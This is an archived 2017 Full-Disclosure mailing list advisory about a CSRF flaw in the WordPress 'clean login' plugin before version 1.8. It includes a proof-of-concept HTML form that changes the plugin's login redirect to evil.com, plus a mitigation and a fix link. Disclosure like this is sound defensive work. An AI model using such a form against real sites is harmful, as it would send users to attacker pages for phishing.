lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 5 May 2017 12:53:28 +0000
From: Zeng Wester <evilzyzeng@...look.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CSRF in wordpress plugin clean login allows remote attacker
 change wordpress login redirect url or logout redirect url to evil address

===============

Software Description

===============

Software:clean login

version:<1.8

description:Responsive Frontend Login and Registration plugin.


========

Details

========

CSRF in wordpress plugin clean login allows remote attacker change wordpress login redirect url or logout redirect url to evil address.


========

POC:

========

<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">

  <input type="text" name= "adminbar" value=“on">

 <input type="text" name="emailnotificationcontent" value="">
 <input type="text" name="termsconditionsMSG" value="">
 <input type="text" name="termsconditionsURL" value="">
 <input type="text" name="urlredirect" value=“http://127.0.0.1/wordpress”>
 <input type=“text” name="loginredirect” value=“on”>
 <input type=“text” name="loginredirect_url” value="http://evil.com”>
 <input type=“text” name="logoutredirect_url” value="http://127.0.0.1/wordpress”>
 <input type=“text” name="cl_hidden_field” value="hidden_field_to_update_others”>
 <input type=“text” name="Submit” value="Save Changes”>
   <input type="submit”>

</form>


=========

Mitigations

================

Disable the plugin until a new version is released that fixes this bug.


=========

Fixed

=========

https://wordpress.org/plugins/clean-login/#developers(1.8 version update)



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists